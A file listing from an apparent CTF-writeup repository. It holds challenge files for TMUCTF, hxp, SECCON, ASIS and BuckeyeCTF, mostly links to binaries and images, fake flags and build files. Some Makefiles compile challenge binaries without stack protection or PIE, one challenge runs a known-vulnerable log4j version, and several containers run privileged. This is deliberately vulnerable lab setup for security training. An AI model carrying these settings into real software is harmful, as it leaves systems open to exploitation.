/Writeups/2021/TMUCTF/Pwn/Security Code/flag.txt:
--------------------------------------------------------------------------------
1 | flag
2 |
--------------------------------------------------------------------------------
/Writeups/2021/TMUCTF/Pwn/Security Code/images/1.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Writeups/2021/TMUCTF/Pwn/Security Code/images/1.jpg
--------------------------------------------------------------------------------
/Writeups/2021/TMUCTF/Pwn/Security Code/images/2.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Writeups/2021/TMUCTF/Pwn/Security Code/images/2.jpg
--------------------------------------------------------------------------------
/Writeups/2021/TMUCTF/Pwn/Security Code/images/3.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Writeups/2021/TMUCTF/Pwn/Security Code/images/3.jpg
--------------------------------------------------------------------------------
/Writeups/2021/TMUCTF/Pwn/Security Code/securitycode:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Writeups/2021/TMUCTF/Pwn/Security Code/securitycode
--------------------------------------------------------------------------------
/Writeups/2021/hxp/misc/Log 4 sanity check/Vuln.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Writeups/2021/hxp/misc/Log 4 sanity check/Vuln.class
--------------------------------------------------------------------------------
/Writeups/2021/hxp/misc/Log 4 sanity check/docker-stuff/readflag:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Writeups/2021/hxp/misc/Log 4 sanity check/docker-stuff/readflag
--------------------------------------------------------------------------------
/Writeups/2021/hxp/misc/Log 4 sanity check/log4j-api-2.14.1.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Writeups/2021/hxp/misc/Log 4 sanity check/log4j-api-2.14.1.jar
--------------------------------------------------------------------------------
/Writeups/2021/hxp/misc/Log 4 sanity check/log4j-core-2.14.1.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Writeups/2021/hxp/misc/Log 4 sanity check/log4j-core-2.14.1.jar
--------------------------------------------------------------------------------
/Writeups/2021/hxp/misc/Log 4 sanity check/run.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 | set -euo pipefail
3 | exec java -cp ".:log4j-api-2.14.1.jar:log4j-core-2.14.1.jar" Vuln
4 |
--------------------------------------------------------------------------------
/Writeups/2021/hxp/misc/Log 4 sanity check/ynetd:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Writeups/2021/hxp/misc/Log 4 sanity check/ynetd
--------------------------------------------------------------------------------
/Writeups/2021/seccon/average/average:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Writeups/2021/seccon/average/average
--------------------------------------------------------------------------------
/Writeups/2021/seccon/average/libc.so.6:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Writeups/2021/seccon/average/libc.so.6
--------------------------------------------------------------------------------
/Writeups/2024/ASIS Quals/Detic/requirements.txt:
--------------------------------------------------------------------------------
1 | scipy==1.14.1
2 |
--------------------------------------------------------------------------------
/Writeups/2024/ASIS Quals/README.md:
--------------------------------------------------------------------------------
1 | ## ASIS 2024 CTF Writeups
2 |
3 | - Detic (Misc Challenge)
4 | - Snoopy (Misc Challenge)
5 |
--------------------------------------------------------------------------------
/Writeups/2024/ASIS Quals/Snoopy/images/image1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Writeups/2024/ASIS Quals/Snoopy/images/image1.png
--------------------------------------------------------------------------------
/Writeups/2024/ASIS Quals/Snoopy/images/image2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Writeups/2024/ASIS Quals/Snoopy/images/image2.png
--------------------------------------------------------------------------------
/Writeups/2024/ASIS Quals/Snoopy/images/image3.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Writeups/2024/ASIS Quals/Snoopy/images/image3.png
--------------------------------------------------------------------------------
/Writeups/2024/ASIS Quals/Snoopy/images/image4.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Writeups/2024/ASIS Quals/Snoopy/images/image4.png
--------------------------------------------------------------------------------
/Writeups/2024/ASIS Quals/Snoopy/snoopy.pcap:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Writeups/2024/ASIS Quals/Snoopy/snoopy.pcap
--------------------------------------------------------------------------------
/Writeups/2024/BuckeyeCTF/SSFS/images/image1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Writeups/2024/BuckeyeCTF/SSFS/images/image1.png
--------------------------------------------------------------------------------
/Writeups/2024/BuckeyeCTF/SSFS/source/flag.txt:
--------------------------------------------------------------------------------
1 | bctf{fake_flag}
2 |
--------------------------------------------------------------------------------
/Writeups/2024/BuckeyeCTF/SSFS/source/requirements.txt:
--------------------------------------------------------------------------------
1 | flask
2 | gunicorn
3 | eventlet
--------------------------------------------------------------------------------
/Writeups/2024/BuckeyeCTF/color/source/Makefile:
--------------------------------------------------------------------------------
1 | all: clean color
2 |
3 | dist: clean color
4 | zip export.zip color color.c Makefile Dockerfile
5 |
6 | color: color.c
7 | gcc -w color.c -o color
8 |
9 | clean:
10 | rm -f color export.zip
11 |
--------------------------------------------------------------------------------
/Writeups/2024/BuckeyeCTF/color/source/color:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Writeups/2024/BuckeyeCTF/color/source/color
--------------------------------------------------------------------------------
/Writeups/2024/BuckeyeCTF/quotes/source/Dockerfile:
--------------------------------------------------------------------------------
1 | FROM node:lts AS runtime
2 | WORKDIR /app
3 |
4 | RUN npm install -g pnpm
5 |
6 | COPY package.json .
7 | COPY pnpm-lock.yaml .
8 |
9 | RUN pnpm install
10 |
11 | COPY quotes quotes
12 | COPY app.js .
13 |
14 | EXPOSE 3000
15 | ENV PORT=3000
16 | ENV NODE_ENV=production
17 | CMD ["pnpm", "start"]
18 |
--------------------------------------------------------------------------------
/Writeups/2024/BuckeyeCTF/quotes/source/README.md:
--------------------------------------------------------------------------------
1 | # quotes
2 |
3 | I'm launching 🚀 my new ✨ SaaS providing quotes 📝 as an API 💪!
4 |
5 | ## Run
6 |
7 | ```
8 | docker build . -t quotes
9 | docker run -p 3000:3000 quotes
10 | ```
11 |
12 | Then go to https://localhost:3000
13 |
--------------------------------------------------------------------------------
/Writeups/2024/BuckeyeCTF/reduce_cycle/png_header.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Writeups/2024/BuckeyeCTF/reduce_cycle/png_header.bin
--------------------------------------------------------------------------------
/Writeups/2024/BuckeyeCTF/runway0/source/Makefile:
--------------------------------------------------------------------------------
1 | all: runway0.c
2 | gcc runway0.c -o runway0
--------------------------------------------------------------------------------
/Writeups/2024/BuckeyeCTF/runway0/source/docker-compose.yaml:
--------------------------------------------------------------------------------
1 | services:
2 | app:
3 | build:
4 | context: .
5 | ports:
6 | - 8001:5000
7 | privileged: true
--------------------------------------------------------------------------------
/Writeups/2024/BuckeyeCTF/runway0/source/flag.txt:
--------------------------------------------------------------------------------
1 | bctf{this_is_a_fake_flag}
--------------------------------------------------------------------------------
/Writeups/2024/BuckeyeCTF/runway0/source/runway0:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Writeups/2024/BuckeyeCTF/runway0/source/runway0
--------------------------------------------------------------------------------
/Writeups/2024/BuckeyeCTF/runway1/source/Makefile:
--------------------------------------------------------------------------------
1 | all: runway1.c
2 | gcc runway1.c -o runway1 -fno-stack-protector -no-pie -m32
--------------------------------------------------------------------------------
/Writeups/2024/BuckeyeCTF/runway1/source/docker-compose.yaml:
--------------------------------------------------------------------------------
1 | services:
2 | app:
3 | build:
4 | context: .
5 | ports:
6 | - 8002:5000
7 | privileged: true
--------------------------------------------------------------------------------
/Writeups/2024/BuckeyeCTF/runway1/source/flag.txt:
--------------------------------------------------------------------------------
1 | bctf{this_is_a_fake_flag}
--------------------------------------------------------------------------------
/Writeups/2024/BuckeyeCTF/runway1/source/runway1:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Writeups/2024/BuckeyeCTF/runway1/source/runway1
--------------------------------------------------------------------------------
/Writeups/2024/BuckeyeCTF/runway2/source/Makefile:
--------------------------------------------------------------------------------
1 | all: runway2.c
2 | gcc runway2.c -o runway2 -fno-stack-protector -no-pie -m32
--------------------------------------------------------------------------------
/Writeups/2024/BuckeyeCTF/runway2/source/docker-compose.yaml:
--------------------------------------------------------------------------------
1 | services:
2 | app:
3 | build:
4 | context: .
5 | ports:
6 | - 8003:5000
7 | privileged: true
--------------------------------------------------------------------------------
/Writeups/2024/BuckeyeCTF/runway2/source/flag.txt:
--------------------------------------------------------------------------------
1 | bctf{this_is_a_fake_flag}
--------------------------------------------------------------------------------
/Writeups/2024/BuckeyeCTF/runway2/source/runway2:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Writeups/2024/BuckeyeCTF/runway2/source/runway2
--------------------------------------------------------------------------------
/Writeups/2024/BuckeyeCTF/runway3/source/Makefile:
--------------------------------------------------------------------------------
1 | all: runway3.c
2 | gcc runway3.c -o runway3 -no-pie
--------------------------------------------------------------------------------
/Writeups/2024/BuckeyeCTF/runway3/source/docker-compose.yaml:
--------------------------------------------------------------------------------
1 | services:
2 | app:
3 | build:
4 | context: .
5 | ports:
6 | - 8004:5000
7 | privileged: true
--------------------------------------------------------------------------------
/Writeups/2024/BuckeyeCTF/runway3/source/flag.txt:
--------------------------------------------------------------------------------
1 | bctf{this_is_a_fake_flag}
--------------------------------------------------------------------------------
/Writeups/2024/BuckeyeCTF/runway3/source/runway3:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Writeups/2024/BuckeyeCTF/runway3/source/runway3
--------------------------------------------------------------------------------
/Writeups/2024/BuckeyeCTF/the_CIA/_protected-cia-document.pdf.extracted/1C749:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Writeups/2024/BuckeyeCTF/the_CIA/_protected-cia-document.pdf.extracted/1C749
--------------------------------------------------------------------------------
/Writeups/2024/BuckeyeCTF/the_CIA/_protected-cia-document.pdf.extracted/1C749.zlib:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Writeups/2024/BuckeyeCTF/the_CIA/_protected-cia-document.pdf.extracted/1C749.zlib
--------------------------------------------------------------------------------
/Writeups/2024/BuckeyeCTF/the_CIA/protected-cia-document.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Writeups/2024/BuckeyeCTF/the_CIA/protected-cia-document.pdf
--------------------------------------------------------------------------------
/Writeups/2024/BuckeyeCTF/wreck/output.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Writeups/2024/BuckeyeCTF/wreck/output.jpg
--------------------------------------------------------------------------------
/Writeups/2024/BuckeyeCTF/xnor/xnor_output.txt:
--------------------------------------------------------------------------------
1 | Key: [[REDACTED]]
2 |
3 | Message: b'Blue is greener than purple for sure!'
4 | Enrypted message: fe9d88f3d675d0c90d95468212b79e929efffcf281d04f0cfa6d07704118943da2af36b9f8
5 |
6 | Flag: [[REDACTED]]
7 | Encrypted flag: de9289f08d6bcb90359f4dd70e8d95829fc8ffaf90ce5d21f96e3d635f148a68e4eb32efa4
8 |
--------------------------------------------------------------------------------
/Writeups/README.md:
--------------------------------------------------------------------------------
1 | This repo includes Challenge writeups for CTF Competitions which I Participated and Solved.
2 |
--------------------------------------------------------------------------------